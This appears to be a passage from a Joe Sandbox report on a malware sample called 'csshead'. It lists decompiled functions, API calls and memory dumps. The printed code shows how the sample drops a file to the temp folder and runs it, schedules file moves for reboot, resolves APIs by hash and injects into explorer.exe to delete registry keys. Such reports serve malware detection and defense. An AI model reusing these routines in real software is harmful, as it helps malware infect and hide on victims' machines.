					if( *0x40a034 == 0) {
						_t50 = E00404968(0x80000001, _t96,  &_v530);
						asm("sbb eax, eax");
						_t38 =  ~( ~_t50);
						if(_t38 != 0 &&  *0x40b514 > 0 &&  *0x40b510 != 0) {
							_t97 =  *0x40b514; // 0x0
							_t104 =  *0x40b510; // 0x0
							E0040485C(0x40b518, _t97, _t104);
							return E0040763C(0x40b518);
						}
					} else {
						_t57 = E00404968(0x80000002, _t96,  &_v530);
						asm("sbb eax, eax");
						_t38 =  ~( ~_t57);
						if(_t38 != 0) {
							if(_v8 != 0) {
								_t100 =  *0x40b514; // 0x0
								_t109 =  *0x40b510; // 0x0
								E0040485C(0x40b518, _t100, _t109);
								return E0040763C(0x40b518);
							}
							E00401308( &_v273, 0x40b518);
							_v12 =  &_v273;
							_v16 = 0;
							while( *_v12 != 0) {
								if( *_v12 == 0x5c) {
									_v16 = _v12;
								}
								_v12 = _v12 + 1;
							}
							if(_v16 == 0) {
								_v16 =  &_v273;
							} else {
								_v16 = _v16 + 1;
							}
							 *_v16 = 0;
							_v12 = E00403B80(9, 0x19, 0x14);
							E0040133C(_v16, _v12);
							E00401440(_v12);
							E0040133C(_v16, ".txt");
							_t38 = MoveFileExA( &_v273, 0x40b518, 4);
							if( *0x40b514 > 0 &&  *0x40b510 != 0) {
								_t99 =  *0x40b514; // 0x0
								_t108 =  *0x40b510; // 0x0
								E0040485C( &_v273, _t99, _t108);
								return E0040763C( &_v273);
							}
						}
					}
				}
				return _t38;
			}

0x004076a0
0x004076a9
0x004076b3
0x004076d1
0x004076e0
0x004076f4
0x004076f9
0x004076fc
0x00407707
0x0040770d
0x00407714
0x0040771a
0x00407727
0x00407738
0x0040774c
0x00407754
0x00407761
0x00407766
0x00407766
0x00407770
0x0040789e
0x004078a5
0x004078a7
0x004078ab
0x004078c4
0x004078ca
0x004078d0
0x00000000
0x004078da
0x00407776
0x00407781
0x00407788
0x0040778a
0x0040778e
0x00407798
0x0040779f
0x004077a5
0x004077ab
0x00000000
0x004077b5
0x004077ca
0x004077d5
0x004077da
0x004077f0
0x004077e5
0x004077ea
0x004077ea
0x004077ed
0x004077ed
0x004077fc
0x00407809
0x004077fe
0x004077fe
0x004077fe
0x0040780f
0x0040781d
0x00407828
0x00407833
0x00407841
0x00407857
0x00407864
0x00407875
0x0040787b
0x00407881
0x00000000
0x0040788c
0x00407864
0x0040778e
0x00407770
0x004078e2

APIs

Part of subcall function 00403FC8: CoInitialize.OLE32(00000000), ref: 00404001
Part of subcall function 00403FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00404089
Part of subcall function 00403FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 004040A7

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

MoveFileExA.KERNEL32(?,0040B518,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00407857

Part of subcall function 00404968: SHGetValueA.SHLWAPI(?,00401DAC,?,00000001,00000000,?), ref: 004049B1
Part of subcall function 00404968: RegOpenKeyExA.ADVAPI32(?,00401DAC,00000000,000F003F,?), ref: 004049D0

Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE

Part of subcall function 0040763C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407658
Part of subcall function 0040763C: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040766D
Part of subcall function 0040763C: CloseHandle.KERNEL32(000000FF), ref: 0040768A

Strings

.txt, xrefs: 00407838
.lnk, xrefs: 004076E8

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 0042CAB5, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129

APIs

_strlen.LIBCMT ref: 0042CADF

Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C

_strlen.LIBCMT ref: 0042CB10

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Part of subcall function 00425114: GetCurrentProcess.KERNEL32 ref: 0042512A
Part of subcall function 00425114: TerminateProcess.KERNEL32(00000000), ref: 00425131

Part of subcall function 0042E750: x_ismbbtype_l.LIBCMT ref: 0042E75E

Strings

, xrefs: 0042CC13

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042CAB5, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129

C-Code - Quality: 75%

			E0042CAB5(void* __ecx, intOrPtr* __edx, void* __edi, signed int* _a4, signed int _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _t50;
				void* _t51;
				signed int _t53;
				void* _t56;
				signed int _t57;
				void* _t58;
				signed int* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr* _t69;
				void* _t81;
				signed char _t83;
				void* _t86;
				intOrPtr* _t96;
				unsigned int _t98;
				intOrPtr* _t104;
				signed int _t105;
				void* _t107;
				signed int _t108;
				signed int _t110;
				signed int _t113;
				signed int _t115;
				intOrPtr* _t116;
				void* _t121;

				_t107 = __edi;
				_t104 = __edx;
				if( *0x444aa4 == 0) {
					_t50 = E004259A7(__ecx);
				}
				_t113 =  *0x442c34; // 0x0
				_push(_t107);
				_t108 = 0;
				if(_t113 != 0) {
					while(1) {
						_t51 =  *_t113;
						if(_t51 == 0) {
							break;
						}
						if(_t51 != 0x3d) {
							_t108 = _t108 + 1;
						}
						_t113 = _t113 + E00427970(_t113) + 1;
					}
					_t50 = E0042A124(_t108 + 1, 4);
					_t110 = _t50;
					 *0x442c10 = _t110;
					if(_t110 == 0) {
						goto L3;
					} else {
						_t115 =  *0x442c34; // 0x0
						while( *_t115 != 0) {
							_t3 = E00427970(_t115) + 1; // 0x1
							_t81 = _t3;
							if( *_t115 == 0x3d) {
								L14:
								_t115 = _t115 + _t81;
								continue;
							} else {
								_t56 = E0042A124(_t81, 1);
								_pop(_t95);
								 *_t110 = _t56;
								if(_t56 == 0) {
									_t57 = E00422804( *0x442c10);
									 *0x442c10 =  *0x442c10 & 0x00000000;
									_t53 = _t57 | 0xffffffff;
									L17:
									goto L18;
								} else {
									_t58 = L00422AAC(_t56, _t81, _t115);
									_t121 = _t121 + 0xc;
									if(_t58 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L00425114();
										asm("int3");
										_t96 = _v20;
										_push(_t81);
										_push(_t115);
										 *_t110 = 0;
										_t116 = _t104;
										_t105 = _v24;
										 *_t96 = 1;
										if(_v28 != 0) {
											_a4 =  &(_a4[1]);
											 *_a4 = _t105;
										}
										_v8 = 0;
										do {
											if( *_t116 != 0x22) {
												 *_t110 =  *_t110 + 1;
												if(_t105 != 0) {
													 *_t105 =  *_t116;
													_a8 = _t105 + 1;
												}
												_t83 =  *_t116;
												_t116 = _t116 + 1;
												if(E0042E750(_t83 & 0x000000ff) != 0) {
													 *_t110 =  *_t110 + 1;
													if(_a8 != 0) {
														_a8 = _a8 + 1;
														 *_a8 =  *_t116;
													}
													_t116 = _t116 + 1;
												}
												_t105 = _a8;
												_t96 = _a12;
												if(_t83 == 0) {
													_t116 = _t116 - 1;
												} else {
													goto L33;
												}
											} else {
												_t83 = 0x22;
												_t116 = _t116 + 1;
												_v8 = 0 | _v8 == 0x00000000;
												goto L33;
											}
											L38:
											_v8 = _v8 & 0x00000000;
											L39:
											while( *_t116 != 0) {
												while(1) {
													_t65 =  *_t116;
													if(_t65 != 0x20 && _t65 != 9) {
														break;
													}
													_t116 = _t116 + 1;
												}
												if( *_t116 != 0) {
													if(_a4 != 0) {
														_a4 =  &(_a4[1]);
														 *_a4 = _t105;
													}
													 *_t96 =  *_t96 + 1;
													while(1) {
														_t86 = 1;
														_t98 = 0;
														L50:
														while( *_t116 == 0x5c) {
															_t116 = _t116 + 1;
															_t98 = _t98 + 1;
														}
														if( *_t116 == 0x22) {
															if((_t98 & 0x00000001) == 0) {
																if(_v8 == 0) {
																	L56:
																	_t86 = 0;
																	_v8 = 0 | _v8 == 0x00000000;
																} else {
																	_t69 = _t116 + 1;
																	if( *_t69 != 0x22) {
																		goto L56;
																	} else {
																		_t116 = _t69;
																	}
																}
															}
															_t98 = _t98 >> 1;
														}
														if(_t98 != 0) {
															do {
																_t98 = _t98 - 1;
																if(_t105 != 0) {
																	 *_t105 = 0x5c;
																	_t105 = _t105 + 1;
																}
																 *_t110 =  *_t110 + 1;
															} while (_t98 != 0);
															_a8 = _t105;
														}
														_t66 =  *_t116;
														if(_t66 != 0 && (_v8 != 0 || _t66 != 0x20 && _t66 != 9)) {
															if(_t86 != 0) {
																_push(_t66);
																if(_t105 == 0) {
																	if(E0042E750() != 0) {
																		_t116 = _t116 + 1;
																		 *_t110 =  *_t110 + 1;
																	}
																} else {
																	if(E0042E750() != 0) {
																		_a8 = _a8 + 1;
																		 *_a8 =  *_t116;
																		_t116 = _t116 + 1;
																		 *_t110 =  *_t110 + 1;
																	}
																	_a8 = _a8 + 1;
																	 *_a8 =  *_t116;
																}
																 *_t110 =  *_t110 + 1;
																_t105 = _a8;
															}
															_t116 = _t116 + 1;
															_t86 = 1;
															_t98 = 0;
															goto L50;
														}
														if(_t105 != 0) {
															 *_t105 = 0;
															_t105 = _t105 + 1;
															_a8 = _t105;
														}
														 *_t110 =  *_t110 + 1;
														_t96 = _a12;
														goto L39;
													}
												}
												break;
											}
											_t64 = _a4;
											if(_t64 != 0) {
												 *_t64 =  *_t64 & 0x00000000;
											}
											 *_t96 =  *_t96 + 1;
											return _t64;
											goto L82;
											L33:
										} while (_v8 != 0 || _t83 != 0x20 && _t83 != 9);
										if(_t105 != 0) {
											 *((char*)(_t105 - 1)) = 0;
										}
										goto L38;
									} else {
										_t110 = _t110 + 4;
										goto L14;
									}
								}
							}
							goto L82;
						}
						E00422804( *0x442c34);
						 *0x442c34 =  *0x442c34 & 0x00000000;
						 *_t110 =  *_t110 & 0x00000000;
						 *0x444a98 = 1;
						_t53 = 0;
						goto L17;
					}
				} else {
					L3:
					_t53 = _t50 | 0xffffffff;
					L18:
					return _t53;
				}
				L82:
			}

0x0042cab5
0x0042cab5
0x0042cabc
0x0042cabe
0x0042cabe
0x0042cac4
0x0042caca
0x0042cacb
0x0042cacf
0x0042cae9
0x0042cae9
0x0042caed
0x00000000
0x00000000
0x0042cadb
0x0042cadd
0x0042cadd
0x0042cae5
0x0042cae5
0x0042caf3
0x0042caf8
0x0042cafc
0x0042cb04
0x00000000
0x0042cb06
0x0042cb06
0x0042cb42
0x0042cb19
0x0042cb19
0x0042cb1c
0x0042cb40
0x0042cb40
0x00000000
0x0042cb1e
0x0042cb21
0x0042cb27
0x0042cb28
0x0042cb2c
0x0042cb73
0x0042cb78
0x0042cb7f
0x0042cb68
0x00000000
0x0042cb2e
0x0042cb31
0x0042cb36
0x0042cb3b
0x0042cb86
0x0042cb87
0x0042cb88
0x0042cb89
0x0042cb8a
0x0042cb8b
0x0042cb90
0x0042cb97
0x0042cb9a
0x0042cb9d
0x0042cb9e
0x0042cba0
0x0042cba2
0x0042cba5
0x0042cbae
0x0042cbb3
0x0042cbb7
0x0042cbb7
0x0042cbb9
0x0042cbbc
0x0042cbbf
0x0042cbd1
0x0042cbd5
0x0042cbd9
0x0042cbdc
0x0042cbdc
0x0042cbdf
0x0042cbe5
0x0042cbee
0x0042cbf0
0x0042cbf6
0x0042cbfd
0x0042cc00
0x0042cc00
0x0042cc02
0x0042cc02
0x0042cc03
0x0042cc06
0x0042cc0b
0x0042cc3f
0x00000000
0x00000000
0x00000000
0x0042cbc1
0x0042cbc6
0x0042cbcb
0x0042cbcc
0x00000000
0x0042cbcc
0x0042cc25
0x0042cc25
0x00000000
0x0042cc29
0x0042cc32
0x0042cc32
0x0042cc36
0x00000000
0x00000000
0x0042cc3c
0x0042cc3c
0x0042cc45
0x0042cc4f
0x0042cc54
0x0042cc58
0x0042cc58
0x0042cc5a
0x0042cc5c
0x0042cc5e
0x0042cc5f
0x00000000
0x0042cc65
0x0042cc63
0x0042cc64
0x0042cc64
0x0042cc6d
0x0042cc72
0x0042cc78
0x0042cc86
0x0042cc88
0x0042cc90
0x0042cc7a
0x0042cc7a
0x0042cc80
0x00000000
0x0042cc82
0x0042cc82
0x0042cc82
0x0042cc80
0x0042cc78
0x0042cc93
0x0042cc93
0x0042cc97
0x0042cc99
0x0042cc99
0x0042cc9c
0x0042cc9e
0x0042cca1
0x0042cca1
0x0042cca2
0x0042cca4
0x0042cca8
0x0042cca8
0x0042ccab
0x0042ccaf
0x0042ccc1
0x0042ccc6
0x0042ccc9
0x0042ccf6
0x0042ccf8
0x0042ccf9
0x0042ccf9
0x0042cccb
0x0042ccd3
0x0042ccda
0x0042ccdd
0x0042ccdf
0x0042cce0
0x0042cce0
0x0042cce7
0x0042ccea
0x0042ccea
0x0042ccfb
0x0042ccfd
0x0042ccfd
0x0042cd00
0x0042cc5e
0x0042cc5f
0x00000000
0x0042cc61
0x0042cd08
0x0042cd0a
0x0042cd0d
0x0042cd0e
0x0042cd0e
0x0042cd11
0x0042cd13
0x00000000
0x0042cd13
0x0042cc5c
0x00000000
0x0042cc45
0x0042cd1b
0x0042cd22
0x0042cd24
0x0042cd24
0x0042cd27
0x0042cd2a
0x00000000
0x0042cc0d
0x0042cc0d
0x0042cc1f
0x0042cc21
0x0042cc21
0x00000000
0x0042cb3d
0x0042cb3d
0x00000000
0x0042cb3d
0x0042cb3b
0x0042cb2c
0x00000000
0x0042cb1c
0x0042cb4d
0x0042cb52
0x0042cb59
0x0042cb5c
0x0042cb66
0x00000000
0x0042cb66
0x0042cad1
0x0042cad1
0x0042cad1
0x0042cb6a
0x0042cb6c
0x0042cb6c
0x00000000

APIs

_strlen.LIBCMT ref: 0042CADF

Part of subcall function 0042A124: Sleep.KERNEL32(00000000,00000001,00000214), ref: 0042A14C

_strlen.LIBCMT ref: 0042CB10

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C

Part of subcall function 00425114: GetCurrentProcess.KERNEL32 ref: 0042512A
Part of subcall function 00425114: TerminateProcess.KERNEL32(00000000), ref: 00425131

Part of subcall function 0042E750: x_ismbbtype_l.LIBCMT ref: 0042E75E

Strings

, xrefs: 0042CC13

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004287A6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97LIBRARYCODE

APIs

Part of subcall function 00428185: __fltout2.LIBCMT ref: 004281B4

__fltout2.LIBCMT ref: 004287D1

Part of subcall function 0042F564: ___dtold.LIBCMT ref: 0042F58A

Part of subcall function 0042F3FE: _strlen.LIBCMT ref: 0042F499

__cftof2_l.LIBCMT ref: 0042885E

Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428660
Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428684

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

Strings

-, xrefs: 004287FE

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004286E5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80LIBRARYCODE

APIs

__fltout2.LIBCMT ref: 00428710

Part of subcall function 0042F564: ___dtold.LIBCMT ref: 0042F58A

Part of subcall function 0042F3FE: _strlen.LIBCMT ref: 0042F499

__cftof2_l.LIBCMT ref: 0042878F

Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428660
Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428684

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

Strings

-, xrefs: 00428768

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041E470, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77

APIs

SelectObject.GDI32(?,00000000), ref: 0041E504

Strings

(, xrefs: 0041E4C2
D, xrefs: 0041E529

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00407D3C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71

C-Code - Quality: 100%

			E00407D3C(void* __eax, void* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v85;
				char _v342;
				void* _t34;
				intOrPtr _t42;
				void* _t55;
				intOrPtr _t58;

				_t55 = __ecx;
				_v8 = __eax;
				_v342 = 0;
				GetTempPathA(0x101,  &_v342);
				_v12 = _v8;
				_v16 = 0;
				while(1) {
					_t34 = _v12;
					if( *_t34 == 0) {
						break;
					}
					__eflags =  *_v12 - 0x2f;
					if( *_v12 == 0x2f) {
						_v16 = _v12;
					}
					_t10 =  &_v12;
					 *_t10 = _v12 + 1;
					__eflags =  *_t10;
				}
				if(_v16 != 0) {
					_v16 = _v16 + 1;
					E0040133C( &_v342, _v16);
					if(E00403C28(_v8, _t55,  &_v342) == 0) {
						_t42 =  *0x40a170; // 0x401e04
						return E00407240(_t42, __eflags);
					}
					_t34 = ShellExecuteA(0, 0,  &_v342, 0, 0, 5);
					_v20 = _t34;
					_t66 = _v20 - 0x20;
					if(_v20 <= 0x20) {
						E00401864(_v20,  &_v85);
						_t58 =  *0x40a16c; // 0x401df8
						E00401308( &_v342, _t58);
						E0040133C( &_v342,  &_v85);
						return E00407240( &_v342, _t66);
					}
				}
				return _t34;
			}

0x00407d3c
0x00407d45
0x00407d48
0x00407d5b
0x00407d64
0x00407d69
0x00407d7f
0x00407d7f
0x00407d85
0x00000000
0x00000000
0x00407d71
0x00407d74
0x00407d79
0x00407d79
0x00407d7c
0x00407d7c
0x00407d7c
0x00407d7c
0x00407d8b
0x00407d91
0x00407d9f
0x00407db7
0x00407e1a
0x00000000
0x00407e1f
0x00407dca
0x00407dd0
0x00407dd3
0x00407dd7
0x00407de1
0x00407def
0x00407df5
0x00407e05
0x00000000
0x00407e13
0x00407dd7
0x00407e27

APIs

GetTempPathA.KERNEL32(00000101,00000000), ref: 00407D5B

Part of subcall function 00403C28: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00403E08
Part of subcall function 00403C28: WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00403E55
Part of subcall function 00403C28: CloseHandle.KERNEL32(000000FF), ref: 00403E6B

ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 00407DCA

Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874

Strings

, xrefs: 00407DD3

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00425D81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50

APIs

RtlDecodePointer.NTDLL(0044204C), ref: 00425D92
TlsFree.KERNEL32(00442050,00426218,?,00424C8B), ref: 00425DAC

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Strings

X3D, xrefs: 0042BF65, 0042BF8F

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042A8D8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42LIBRARYCODE

APIs

_UnwindNestedFrames.LIBCMT ref: 0042A902

Part of subcall function 00423F05: RtlUnwind.KERNEL32(00423F30,0?B,?,00000000), ref: 00423F2B

Part of subcall function 0042A2CD: __getptd.LIBCMT ref: 0042A2F4
Part of subcall function 0042A2CD: __CallSettingFrame@12.LIBVCRUNTIME ref: 0042A340

Part of subcall function 0042A52B: __CreateFrameInfo.LIBCMT ref: 0042A553
Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A55D
Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A56B
Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A579
Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A584

Strings

csm, xrefs: 0042A8DA
csm, xrefs: 0042A8E7, 0042A8FC, 0042A90F, 0042A92D, 0042A93D

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042A651, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37LIBRARYCODE

APIs

Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424204
Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424214
Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424225

__getptd.LIBCMT ref: 0042A660

Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB

__getptd.LIBCMT ref: 0042A66E

Part of subcall function 004241D7: __getptd.LIBCMT ref: 004241DC

Strings

csm, xrefs: 0042A67C

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042B105, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 0042B13D

Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5

Strings

D, xrefs: 0042B10E
@#D, xrefs: 0042B117

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Analysis Process: explorer.exe PID: 972 Parent PID: 2236

Execution Graph

Execution Coverage:	21%
Dynamic/Decrypted Code Coverage:	99.9%
Signature Coverage:	8.6%
Total number of Nodes:	1805
Total number of Limit Nodes:	19

Executed Functions

Function 00778A48, Relevance: 3.0, APIs: 2, Instructions: 34
nativewindow

C-Code - Quality: 58%

			E00778A48(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				void* _t12;
				intOrPtr _t23;
				void* _t24;

				_t12 = _a8 - 2;
				if(_t12 == 0) {
					PostQuitMessage(0);
					_v8 = 0;
				} else {
					if(_t12 == 0xf) {
						E007778FC(_a16 & 0x80000000, _t24);
						_v8 = 1;
					} else {
						_t23 =  *0x77b300(_a4, _a8, _a12, _a16); // executed
						_v8 = _t23;
					}
				}
				return _v8;
			}

0x00778a51
0x00778a54
0x00778a5f
0x00778a67
0x00778a56
0x00778a59
0x00778a74
0x00778a79
0x00778a5b
0x00778a92
0x00778a98
0x00778a98
0x00778a59
0x00778aa1

APIs

PostQuitMessage.USER32(00000000), ref: 00778A5F

Part of subcall function 007778FC: SHDeleteKeyA.SHLWAPI(80000002,007721A4), ref: 0077795A
Part of subcall function 007778FC: SHDeleteKeyA.SHLWAPI(80000001,007721A4), ref: 0077796D

NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00778A92

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00778A44, Relevance: 1.5, APIs: 1, Instructions: 26
nativewindow

C-Code - Quality: 58%

			E00778A44(intOrPtr* __eax, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				intOrPtr _v117;
				void* _t15;
				intOrPtr _t26;
				void* _t27;

				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_t15 = _a12 - 2;
				if(_t15 == 0) {
					PostQuitMessage(0);
					_v8 = 0;
				} else {
					if(_t15 == 0xf) {
						E007778FC(_a16 & 0x80000000, _t27);
						_v8 = 1;
					} else {
						_t26 =  *0x77b300(_a4, _a8, _a12, _a16); // executed
						_v8 = _t26;
					}
				}
				return _v8;
			}

0x00778a45
0x00778a47
0x00778a51
0x00778a54
0x00778a5f
0x00778a67
0x00778a56
0x00778a59
0x00778a74
0x00778a79
0x00778a5b
0x00778a92
0x00778a98
0x00778a98
0x00778a59
0x00778aa1

APIs

Part of subcall function 007778FC: SHDeleteKeyA.SHLWAPI(80000002,007721A4), ref: 0077795A
Part of subcall function 007778FC: SHDeleteKeyA.SHLWAPI(80000001,007721A4), ref: 0077796D

PostQuitMessage.USER32(00000000), ref: 00778A5F
NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00778A92

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00772574, Relevance: 53.6, APIs: 14, Strings: 16, Instructions: 1068
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00772574(intOrPtr __eax) {
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				CHAR* _t492;
				CHAR* _t500;
				struct HINSTANCE__* _t564;
				CHAR* _t567;
				struct HINSTANCE__* _t568;
				CHAR* _t571;
				CHAR* _t587;
				CHAR* _t669;
				CHAR* _t677;
				CHAR* _t685;
				struct HINSTANCE__* _t686;
				CHAR* _t693;
				CHAR* _t699;
				struct HINSTANCE__* _t700;
				CHAR* _t707;
				intOrPtr _t712;
				CHAR* _t713;
				struct HINSTANCE__* _t714;
				CHAR* _t755;
				struct HINSTANCE__* _t756;

				_v8 = __eax;
				_v12 = E007724F8();
				 *0x77b11c = E00771994(_v12, 0xc8ac8026);
				 *0x77b120 = E00771994(_v12, 0x4b935b8e);
				 *0x77b1d0 = E00771994(_v12, 0x78b00c7e);
				 *0x77b144 = E00771994(_v12, 0x25447ac6);
				 *0x77b148 = E00771994(_v12, 0xf50b872);
				 *0x77b160 = E00771994(_v12, 0x9e6fa842);
				 *0x77b1bc = E00771994(_v12, 0x7d544dbd);
				 *0x77b124 = E00771994(_v12, 0x1fc0eaee);
				 *0x77b384 = E00771994(_v12, 0x270118e2);
				 *0x77b498 = E00771994(_v12, 0x4ae7572b);
				 *0x77b138 = E00771994(_v12, 0x81f0f0c9);
				 *0x77b140 = E00771994(_v12, 0x95fb6a02);
				 *0x77b334 = E00771994(_v12, 0x70f6fe31);
				 *0x77b338 = E00771994(_v12, 0x399354ce);
				 *0x77b128 = E00771994(_v12, 0xa45b370a);
				 *0x77b208 = E00771994(_v12, 0x2b00b870);
				 *0x77b1c4 = E00771994(_v12, 0x4fba916c);
